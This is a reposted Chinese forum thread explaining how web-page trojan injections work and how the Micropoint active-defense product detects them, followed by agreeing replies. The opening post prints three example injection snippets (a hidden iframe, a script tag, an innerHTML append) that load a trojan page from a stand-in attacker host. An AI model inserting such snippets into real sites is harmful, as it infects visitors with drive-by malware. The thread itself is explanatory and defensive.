浅谈微点主动防御软件防网页被挂木马功能-转

245536252

给大家浅谈下微点主动防御防网页被挂木马功能。 我感觉我说这个还是有点权威的，为啥啊，因为咱测过啊... 现在微点主动防御已经加了网页拦截木马的功能，（其实早就加了，有小半年了吧？）先说现在的，浏览网页，网页如果有恶意脚本（就是那段该死的木马网页连接）试图对浏览器进行溢出的时候微点就会报警拦截，所以有很多人测试，为啥我网页有网页木马微点为啥不报警？那是因为是有那段网马的地址，但是真正的网马所在服务器不在线了，或者重启中，这时候微点是不报警的。因为那段地址只是存在，但是没有任何意义。 说到这先给大家说下网页被挂的木马到底是啥。 网页被挂木马有两部分，一部分在我们正常浏览的网页上(比如： www.163.com)正常的网站是没有木马的，不能自己打自己嘴巴，那是被黑客入侵，插了一句恶意脚本，通常是 1）<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe> 2）<script src=http://111.tmkkk.com/muma.js language=javascript></script> 3）top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://111.tmkkk.com/muma.htm "></iframe>' 以上是常见的，可能有的朋友看不明白，我简单说下，比如说163.com网站被挂马，用的是<iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>  ，真正的网马所在地址是http://111.tmkkk.com/muma.htm，不在163的服务器上，因为163的服务器有杀毒软件，检测到就自动删除了，所以黑客一般都自己有空间，放在自己的空间。如果赶上黑客所租服务器重启，或者宕机，这个时候浏览163的网站是安全的，只是有个恶意链接，但对系统没有任何作用，所以微点可能是不报警的。很多人大喧说微点拦截网马没用，不是没用，是他不懂。 <iframe src=”http://111.tmkkk.com/muma.htm” width=0 height=0></iframe>是个0窗口，你看不到，一闪而过，那个所存在网页还有个exe文件，是个木马，muma.htm 的脚本大意是自动下载并自动执行木马。 再说微点主动防御之前是如何拦截网页木马的，通过上面已经找到木马是能够自动下载自动执行木马了，微点是靠行为来判断病毒的，所以自动下载木马，微点主动防御不报警，自动执行微点就报警了，有的网马做的比较失败，下载下来了，但是没有被执行，这微点也不会报警。 简单说下啥是网页被挂木马，网上有很多说的都是错的，什么是网页木马，网页木马是webshell，我们常见的网页被挂了木马，到现在还没个通俗的叫法，呵呵。 通过上面我想大家基本对网页被挂木马和微点主动防御软件如何做都的，应该有了解了，希望大家能挑刺拍砖

cocplay

说的好 下面的拍砖！

苏秦

顶楼主啊，很实在

simonfour

实话。。。。
希望那些不了解的能了解一下

coolboy713

好像是那样的

vanbasten111

很好,这也是我长久以来的一个疑问..........

西风萧雨

其实微点的防挂马很好很强大，很多人老是喜欢用那种提示超多的，什么什么拦截了，认为那就是好的安全软件，其实最终目的就是要保护我们电脑的安全就可以了

按这种说的话巨盾的网页木马拦截也是一样的道理。。

HURXI

LZ 是典型的奥特曼
你所讲是之前的微点防挂马
现在微点的防挂马功能是最强的三阶段防御了：
（第一关：挂马网站黑名单
  第二关：挂马网页中的挂马代码连到黑客服务器下载木马阶段的特征识别
  第三关：木马下载下来后运行时的主动防御行为分析）
任意一关过不了即实现防挂马效果。

hw2619

楼主解释的不错，9楼的也很好